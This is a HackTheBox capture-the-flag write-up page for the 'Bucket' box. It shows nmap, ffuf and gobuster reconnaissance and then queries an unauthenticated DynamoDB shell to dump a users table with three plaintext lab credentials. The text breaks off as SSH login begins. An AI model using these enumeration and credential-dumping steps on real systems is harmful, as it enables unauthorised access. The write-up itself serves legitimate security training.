-
Notifications
You must be signed in to change notification settings - Fork 0
/
bucket.html
395 lines (355 loc) · 105 KB
/
bucket.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<!-- iOS Safari -->
<meta name="apple-mobile-web-app-capable" content="yes">
<meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
<!-- Chrome, Firefox OS and Opera Status Bar Color -->
<meta name="theme-color" content="#FFFFFF">
<link rel="stylesheet" type="text/css" href="https://cdnjs.cloudflare.com/ajax/libs/KaTeX/0.11.1/katex.min.css">
<link rel="stylesheet" type="text/css"
href="https://cdnjs.cloudflare.com/ajax/libs/prism/1.19.0/themes/prism.min.css">
<link rel="stylesheet" type="text/css" href="css/SourceSansPro.css">
<link rel="stylesheet" type="text/css" href="css/theme.css">
<link rel="stylesheet" type="text/css" href="css/notablog.css">
<!-- Favicon -->
<link rel="shortcut icon" href="https://www.notion.so/signed/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2Faf7d66d0-6402-4a6f-b9f5-00d2eb9e3482%2Fhackerman.gif?table=collection&id=92e319e1-0c5e-49c7-adc1-7d48fe74e022">
<style>
:root {
font-size: 20px;
}
</style>
<title>Bucket - HackTheBox Writeup (10.10.10.212) | samiko@127.0.0.1~$</title>
<meta property="og:type" content="blog">
<meta property="og:title" content="Bucket - HackTheBox Writeup (10.10.10.212)">
<meta name="description" content="Medium-difficulty Linux box all about exploiting improperly configured Amazon S3 buckets. Privilege escalation by extracting credentials from DynamoDB and leveraging arbitrary file read through PD4ML, an HTML-to-PDF tool.">
<meta property="og:description" content="Medium-difficulty Linux box all about exploiting improperly configured Amazon S3 buckets. Privilege escalation by extracting credentials from DynamoDB and leveraging arbitrary file read through PD4ML, an HTML-to-PDF tool.">
<meta property="og:image" content="https://www.hackthebox.eu/storage/avatars/3f07dd46f3ff7d287d2f736b18c6ded7.png">
<style>
.DateTagBar {
margin-top: 1.0rem;
}
</style>
</head>
<body>
<nav class="Navbar">
<a href="/">
<div class="Navbar__Btn">
<span><img class="inline-img-icon" src="https://www.notion.so/signed/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2Faf7d66d0-6402-4a6f-b9f5-00d2eb9e3482%2Fhackerman.gif?table=collection&id=92e319e1-0c5e-49c7-adc1-7d48fe74e022"></span>
<span>Home</span>
</div>
</a>
</nav>
<header class="Header">
<div class="Header__Spacer Header__Spacer--NoCover">
</div>
<div class="Header__Icon">
<span><img class="inline-img-icon" src="https://www.hackthebox.eu/storage/avatars/3f07dd46f3ff7d287d2f736b18c6ded7.png"></span>
</div>
<h1 class="Header__Title">Bucket - HackTheBox Writeup (10.10.10.212)</h1>
<div class="DateTagBar">
<span class="DateTagBar__Item DateTagBar__Date">Posted on Sun, May 2, 2021</span>
<span class="DateTagBar__Item DateTagBar__Tag DateTagBar__Tag--yellow">
<a href="tag/Medium">Medium</a>
</span>
<span class="DateTagBar__Item DateTagBar__Tag DateTagBar__Tag--orange">
<a href="tag/Linux">Linux</a>
</span>
<span class="DateTagBar__Item DateTagBar__Tag DateTagBar__Tag--blue">
<a href="tag/Amazon_DynamoDB">Amazon DynamoDB</a>
</span>
<span class="DateTagBar__Item DateTagBar__Tag DateTagBar__Tag--orange">
<a href="tag/Amazon_S3">Amazon S3</a>
</span>
<span class="DateTagBar__Item DateTagBar__Tag DateTagBar__Tag--purple">
<a href="tag/Pd4Cmd">Pd4Cmd</a>
</span>
</div>
<div>
Medium-difficulty Linux box all about exploiting improperly configured Amazon S3 buckets. Privilege escalation by extracting credentials from DynamoDB and leveraging arbitrary file read through PD4ML, an HTML-to-PDF tool.
</div>
</header>
<article id="https://www.notion.so/09bb09bcdcdc42a98709118e15580e62" class="PageRoot PageRoot--FullWidth"><h2 id="https://www.notion.so/a79c85890e4946578d3a3421f459b4bc" class="ColorfulBlock ColorfulBlock--ColorDefault Heading Heading--2"><a class="Anchor" href="#https://www.notion.so/a79c85890e4946578d3a3421f459b4bc"><svg width="16" height="16" viewBox="0 0 16 16"><path fill-rule="evenodd" d="M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z"></path></svg></a><span class="SemanticStringArray"><span class="SemanticString">Recon</span></span></h2><ul class="BulletedListWrapper"><li id="https://www.notion.so/9ab38b2034a14a77ba6e8ceb171f1cdd" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Port scan:</span></span><div id="https://www.notion.so/673f969a7bda423c85d7e1fbadf2fb9c" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ nmap -p- 10.10.10.212 > ports.nmap</code></span></span></p></div><pre id="https://www.notion.so/29c69f07fffa47d9ae3843a37c0cc091" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>PORT STATE SERVICE
22/tcp open ssh
80/tcp open http</span></span></span></code></pre></li><li id="https://www.notion.so/28af846f7a0c4291a3e856fb431750c3" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Targeted scan:</span></span><div id="https://www.notion.so/fa3b3b4955b641ba98538b289bac76ce" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ nmap -sC -sV -p 22,80 10.10.10.212 > targeted.nmap</code></span></span></p></div><pre id="https://www.notion.so/6c8983377b0d4ebd997837ed5321fdea" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
| 256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_ 256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
80/tcp open http Apache httpd 2.4.41
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Did not follow redirect to http://bucket.htb/
Service Info: Host: 127.0.1.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel</span></span></span></code></pre><div id="https://www.notion.so/9cf3d78430984948bca7319bd75c9e78" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">OpenSSH 8.2p1 Ubuntu 4, Apache httpd 2.4.41</span></span></p></div></li></ul><h2 id="https://www.notion.so/16f7f08264204ab990e9474caa21c211" class="ColorfulBlock ColorfulBlock--ColorDefault Heading Heading--2"><a class="Anchor" href="#https://www.notion.so/16f7f08264204ab990e9474caa21c211"><svg width="16" height="16" viewBox="0 0 16 16"><path fill-rule="evenodd" d="M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z"></path></svg></a><span class="SemanticStringArray"><span class="SemanticString">Enumeration</span></span></h2><div id="https://www.notion.so/ff95ccf4d0f846a79bddd8c85b088592" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold">HTTP Enumeration</strong></span></span></p></div><ul class="BulletedListWrapper"><li id="https://www.notion.so/da3e8b4ad69847849f882f85d0d120f0" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Nmap targeted scan reveals vhost </span><span class="SemanticString"><a class="SemanticString__Fragment SemanticString__Fragment--Link" href="http://bucket.htb/">http://bucket.htb/</a></span><span class="SemanticString"> on port 80, add the following entry to </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">/etc/hosts</code></span><span class="SemanticString">:</span></span><div id="https://www.notion.so/2f09cd7e994f4f24a476cc5971461364" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ sudo nano /etc/hosts</code></span></span></p></div><pre id="https://www.notion.so/54ebd5edef284c62a703a1dac6b877dd" class="Code"><code><span class="SemanticStringArray"><span class="SemanticString"><span>10.10.10.212 bucket.htb</span></span></span></code></pre></li><li id="https://www.notion.so/745cb1b3084348dea097de46c4651f81" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Website is an advertising platform for a infosec-centered marketing company.</span></span></li><li id="https://www.notion.so/e97f34ab2e3346c79ea3a170448d78d2" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Found support email address:</span></span><div id="https://www.notion.so/c385e64ee01647cb863d2395a9725dd1" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">support@bucket.htb</code></span></span></p></div></li><li id="https://www.notion.so/f9097279cdad4dc59dec15231875f3f9" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Found subdomain for Amazon Simple Storage Service (Amazon S3), append to entry in the hosts file:</span></span><div id="https://www.notion.so/80479d9b8f124b91ab4cbd6252105b4e" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">http://s3.bucket.htb</code></span></span></p></div></li><li id="https://www.notion.so/e5c8a9e7f8b44a7abe00a26a1cc0b393" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Found </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">adserver</code></span><span class="SemanticString"> directory from image addresses:</span></span><div id="https://www.notion.so/3290de1630184390b022919234d20489" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">http://s3.bucket.htb/adserver/</code></span></span></p></div><div id="https://www.notion.so/ff13cb0cddaf4150819581dd281119b3" class="ColorfulBlock ColorfulBlock--BgGray Callout"><div class="Callout__Icon"><div class="Icon">⚠️</div></div><p class="Callout__Content"><span class="SemanticStringArray"><span class="SemanticString">Optional: If the images on the website are not loading correctly, try disabling any adblocking extensions on your browser.</span></span></p></div></li><li id="https://www.notion.so/25125e516e31445cbf0cc216b2609ab8" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Output upon visiting:</span></span><pre id="https://www.notion.so/cc44983c2a87438e95dd251456d92c50" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span><span class="token punctuation">{</span><span class="token property">"status"</span><span class="token operator">:</span> <span class="token string">"running"</span><span class="token punctuation">}</span></span></span></span></code></pre></li><li id="https://www.notion.so/5aa67c88126343ee89dd1ae33efa1717" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Enumerate subdomains with </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">ffuf</code></span><span class="SemanticString">:</span></span><div id="https://www.notion.so/322a29a798f2429287f906a6d7aae555" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ ffuf -c -w ../Common/directory-list-2.3-medium.txt -u http://bucket.htb -H "Host: FUZZ.bucket.htb" -fc 302</code></span></span></p></div></li><li id="https://www.notion.so/e7192724e4a84d179da90856f4a43be1" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Bruteforce directory on </span><span class="SemanticString"><a class="SemanticString__Fragment SemanticString__Fragment--Link" href="http://bucket.htb/">http://bucket.htb</a></span><span class="SemanticString"> and </span><span class="SemanticString"><a class="SemanticString__Fragment SemanticString__Fragment--Link" href="http://s3.bucket.htb/">http://s3.bucket.htb</a></span><span class="SemanticString"> with </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">gobuster</code></span><span class="SemanticString">:</span></span><div id="https://www.notion.so/9f67fdf8452e473bb856d9247fc23b2b" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ gobuster dir -u http://bucket.htb -t 50 -w ../Common/directory-list-2.3-medium.txt -x .php,.html</code></span></span></p></div><pre id="https://www.notion.so/d2372999edc14929a631952c8a0cae6f" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>/index.html (Status: 200)</span></span></span></code></pre><div id="https://www.notion.so/90d0f1e5352d4da0973086f867733429" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ gobuster dir -u http://s3.bucket.htb -t 50 -w ../Common/directory-list-2.3-medium.txt -x .php,.html</code></span></span></p></div><pre id="https://www.notion.so/25c1f6dce52942aeb10d2bd7abc426f9" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>/health (Status: 200)
/shell (Status: 200)
/server-status (Status: 403)</span></span></span></code></pre></li><li id="https://www.notion.so/3716c058b9a348d4859ff39d85999b95" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">From the </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">/health</code></span><span class="SemanticString"> page we can see that a DynamoDB is being hosted through Amazon Web Services on this subdomain:</span></span><pre id="https://www.notion.so/1c144143dbb843ac994a81fe827d1adb" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span><span class="token punctuation">{</span><span class="token property">"services"</span><span class="token operator">:</span> <span class="token punctuation">{</span><span class="token property">"s3"</span><span class="token operator">:</span> <span class="token string">"running"</span><span class="token punctuation">,</span> <span class="token property">"dynamodb"</span><span class="token operator">:</span> <span class="token string">"running"</span><span class="token punctuation">}</span><span class="token punctuation">}</span></span></span></span></code></pre></li></ul><div id="https://www.notion.so/53cf3da90e0c4cc7a897bfcdda074859" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold">DynamoDB Enumeration</strong></span></span></p></div><ul class="BulletedListWrapper"><li id="https://www.notion.so/c81a3572934b4d969e19321c0bf09fff" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Interacting with the DynamoDB JavaScript shell on </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">/shell</code></span><span class="SemanticString"> requires no authentication.</span></span></li><li id="https://www.notion.so/c72fe21b1ead42f5916debc8e1f7cebd" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">The shell includes the ability to download and upload scripts to be run, also has API templates availble for interacting with the database.</span></span></li><li id="https://www.notion.so/f03f3dd7072040808a11b04a7eb8f70f" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Enumerating tables on the database with </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">ListTables.js</code></span><span class="SemanticString">:</span></span><pre id="https://www.notion.so/00df92adb0d446ba923c9d4f7e463168" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span><span class="token keyword">var</span> params <span class="token operator">=</span> <span class="token punctuation">{</span>
<span class="token literal-property property">ExclusiveStartTableName</span><span class="token operator">:</span> <span class="token string">'table_name'</span><span class="token punctuation">,</span> <span class="token comment">// optional (for pagination, returned as LastEvaluatedTableName)</span>
<span class="token literal-property property">Limit</span><span class="token operator">:</span> <span class="token number">10</span><span class="token punctuation">,</span> <span class="token comment">// optional (to further limit the number of table names returned per page)</span>
<span class="token punctuation">}</span><span class="token punctuation">;</span>
dynamodb<span class="token punctuation">.</span><span class="token function">listTables</span><span class="token punctuation">(</span>params<span class="token punctuation">,</span> <span class="token keyword">function</span><span class="token punctuation">(</span><span class="token parameter">err<span class="token punctuation">,</span> data</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
<span class="token keyword">if</span> <span class="token punctuation">(</span>err<span class="token punctuation">)</span> <span class="token function">ppJson</span><span class="token punctuation">(</span>err<span class="token punctuation">)</span><span class="token punctuation">;</span> <span class="token comment">// an error occurred</span>
<span class="token keyword">else</span> <span class="token function">ppJson</span><span class="token punctuation">(</span>data<span class="token punctuation">)</span><span class="token punctuation">;</span> <span class="token comment">// successful response</span>
<span class="token punctuation">}</span><span class="token punctuation">)</span><span class="token punctuation">;</span></span></span></span></code></pre><div id="https://www.notion.so/46f574ce4851455d91f8a97c50a1b53b" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">Output:</span></span></p></div><pre id="https://www.notion.so/c73c0a2219cb48ac987f35459ef6d42b" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span><span class="token string">"TableNames"</span> <span class="token punctuation">[</span>
<span class="token string">"users"</span>
<span class="token punctuation">]</span></span></span></span></code></pre></li><li id="https://www.notion.so/989339d2050f4f4b95363b72b9087114" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">The database has only one table, named </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">users</code></span><span class="SemanticString">, which is commonly used to store user credentials and sometimes hashed passwords of users.</span></span></li><li id="https://www.notion.so/b24c26b972694a50ba26088118631777" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Enumerating information about </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">users</code></span><span class="SemanticString"> table with </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">DescribeTable.js</code></span><span class="SemanticString">:</span></span><pre id="https://www.notion.so/72744d712391463b8964984d426b1020" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span><span class="token keyword">var</span> params <span class="token operator">=</span> <span class="token punctuation">{</span>
<span class="token literal-property property">TableName</span><span class="token operator">:</span> <span class="token string">'users'</span><span class="token punctuation">,</span>
<span class="token punctuation">}</span><span class="token punctuation">;</span>
dynamodb<span class="token punctuation">.</span><span class="token function">describeTable</span><span class="token punctuation">(</span>params<span class="token punctuation">,</span> <span class="token keyword">function</span><span class="token punctuation">(</span><span class="token parameter">err<span class="token punctuation">,</span> data</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
<span class="token keyword">if</span> <span class="token punctuation">(</span>err<span class="token punctuation">)</span> <span class="token function">ppJson</span><span class="token punctuation">(</span>err<span class="token punctuation">)</span><span class="token punctuation">;</span> <span class="token comment">// an error occurred</span>
<span class="token keyword">else</span> <span class="token function">ppJson</span><span class="token punctuation">(</span>data<span class="token punctuation">)</span><span class="token punctuation">;</span> <span class="token comment">// successful response</span>
<span class="token punctuation">}</span><span class="token punctuation">)</span><span class="token punctuation">;</span></span></span></span></code></pre><div id="https://www.notion.so/a8472b63816e410e82a2305eac15adc0" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">Output:</span></span></p></div><pre id="https://www.notion.so/9c47dad3a8f040d6835fcc79ce67abdf" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span><span class="token string">"Table"</span> <span class="token punctuation">{</span>
<span class="token string">"AttributeDefinitions"</span> <span class="token punctuation">[</span>
<span class="token number">0</span><span class="token operator">:</span> <span class="token punctuation">{</span>
<span class="token property">"AttributeName"</span><span class="token operator">:</span><span class="token string">"username"</span>
<span class="token property">"AttributeType"</span><span class="token operator">:</span><span class="token string">"S"</span>
<span class="token number">1</span><span class="token operator">:</span> <span class="token punctuation">{</span>
<span class="token property">"AttributeName"</span><span class="token operator">:</span><span class="token string">"password"</span>
<span class="token property">"AttributeType"</span><span class="token operator">:</span><span class="token string">"S"</span>
<span class="token property">"TableName"</span><span class="token operator">:</span><span class="token string">"users"</span>
<span class="token string">"KeySchema"</span> <span class="token punctuation">[</span>
<span class="token number">0</span><span class="token operator">:</span> <span class="token punctuation">{</span>
<span class="token property">"AttributeName"</span><span class="token operator">:</span><span class="token string">"username"</span>
<span class="token property">"KeyType"</span><span class="token operator">:</span><span class="token string">"HASH"</span>
<span class="token number">1</span><span class="token operator">:</span> <span class="token punctuation">{</span>
<span class="token property">"AttributeName"</span><span class="token operator">:</span><span class="token string">"password"</span>
<span class="token property">"KeyType"</span><span class="token operator">:</span><span class="token string">"RANGE"</span>
<span class="token property">"TableStatus"</span><span class="token operator">:</span><span class="token string">"ACTIVE"</span>
<span class="token property">"CreationDateTime"</span><span class="token operator">:</span><span class="token string">"2021-02-01T05:19:06.086Z"</span>
<span class="token string">"ProvisionedThroughput"</span> <span class="token punctuation">{</span>
<span class="token property">"LastIncreaseDateTime"</span><span class="token operator">:</span><span class="token string">"1970-01-01T00:00:00.000Z"</span>
<span class="token property">"LastDecreaseDateTime"</span><span class="token operator">:</span><span class="token string">"1970-01-01T00:00:00.000Z"</span>
<span class="token property">"NumberOfDecreasesToday"</span><span class="token operator">:</span><span class="token number">0</span>
<span class="token property">"ReadCapacityUnits"</span><span class="token operator">:</span><span class="token number">5</span>
<span class="token property">"WriteCapacityUnits"</span><span class="token operator">:</span><span class="token number">5</span>
<span class="token property">"TableSizeBytes"</span><span class="token operator">:</span><span class="token number">107</span>
<span class="token property">"ItemCount"</span><span class="token operator">:</span><span class="token number">3</span>
<span class="token property">"TableArn"</span><span class="token operator">:</span><span class="token string">"arn:aws:dynamodb:us-east-1:000000000000:table/users"</span></span></span></span></code></pre></li><li id="https://www.notion.so/cb11a44026b543508672f858f024dfb5" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Dump contents of </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">users</code></span><span class="SemanticString"> table with </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">Scan.js</code></span><span class="SemanticString">:</span></span><pre id="https://www.notion.so/6c73245d7e1448a98cecf14ab1228ba4" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span><span class="token keyword">var</span> params <span class="token operator">=</span> <span class="token punctuation">{</span>
<span class="token literal-property property">TableName</span><span class="token operator">:</span> <span class="token string">'users'</span>
<span class="token punctuation">}</span><span class="token punctuation">;</span>
docClient<span class="token punctuation">.</span><span class="token function">scan</span><span class="token punctuation">(</span>params<span class="token punctuation">,</span> <span class="token keyword">function</span> <span class="token punctuation">(</span><span class="token parameter">err<span class="token punctuation">,</span> data</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
<span class="token keyword">if</span> <span class="token punctuation">(</span>err<span class="token punctuation">)</span> console<span class="token punctuation">.</span><span class="token function">log</span><span class="token punctuation">(</span>err<span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token keyword">else</span> console<span class="token punctuation">.</span><span class="token function">log</span><span class="token punctuation">(</span>data<span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token punctuation">}</span><span class="token punctuation">)</span><span class="token punctuation">;</span></span></span></span></code></pre><div id="https://www.notion.so/ddb75a51a20a41e882ea2e058c85afe1" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">Output:</span></span></p></div><pre id="https://www.notion.so/480a7b28b39d4b3693d49b944bb71740" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span><span class="token punctuation">{</span><span class="token property">"Items"</span><span class="token operator">:</span><span class="token punctuation">[</span>
<span class="token punctuation">{</span><span class="token property">"password"</span><span class="token operator">:</span><span class="token string">"Management@#1@#"</span><span class="token punctuation">,</span><span class="token property">"username"</span><span class="token operator">:</span><span class="token string">"Mgmt"</span><span class="token punctuation">}</span><span class="token punctuation">,</span>
<span class="token punctuation">{</span><span class="token property">"password"</span><span class="token operator">:</span><span class="token string">"Welcome123!"</span><span class="token punctuation">,</span><span class="token property">"username"</span><span class="token operator">:</span><span class="token string">"Cloudadm"</span><span class="token punctuation">}</span><span class="token punctuation">,</span>
<span class="token punctuation">{</span><span class="token property">"password"</span><span class="token operator">:</span><span class="token string">"n2vM-<_K_Q:.Aa2"</span><span class="token punctuation">,</span><span class="token property">"username"</span><span class="token operator">:</span><span class="token string">"Sysadm"</span><span class="token punctuation">}</span><span class="token punctuation">]</span><span class="token punctuation">,</span>
<span class="token property">"Count"</span><span class="token operator">:</span><span class="token number">3</span><span class="token punctuation">,</span><span class="token property">"ScannedCount"</span><span class="token operator">:</span><span class="token number">3</span><span class="token punctuation">}</span></span></span></span></code></pre></li><li id="https://www.notion.so/2810caede1e048a38738f1aae42d62d8" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Found credential pairs:</span></span><div id="https://www.notion.so/3e4dd94929e0466a9e56780e956ee6c9" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">Mgmt:Management@#1@#</code></span></span></p></div><div id="https://www.notion.so/8246f5d2fce342eb9e9af39d6f064724" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">Cloudadm:Welcome123!</code></span></span></p></div><div id="https://www.notion.so/c0f4cfb6407e438287fdbbfa6d5b2e04" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">Sysadm:n2vM-<_K_Q:.Aa2</code></span></span></p></div></li></ul><h2 id="https://www.notion.so/070ab77375764fb6ad32a924df09e8ee" class="ColorfulBlock ColorfulBlock--ColorDefault Heading Heading--2"><a class="Anchor" href="#https://www.notion.so/070ab77375764fb6ad32a924df09e8ee"><svg width="16" height="16" viewBox="0 0 16 16"><path fill-rule="evenodd" d="M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z"></path></svg></a><span class="SemanticStringArray"><span class="SemanticString">Exploitation</span></span></h2><ul class="BulletedListWrapper"><li id="https://www.notion.so/c31877c479bc4f06b201e7839497df3c" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Attempt to SSH with new credentials:</span></span><div id="https://www.notion.so/33924f62221f4b8faa84413bbb8c3f2a" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code 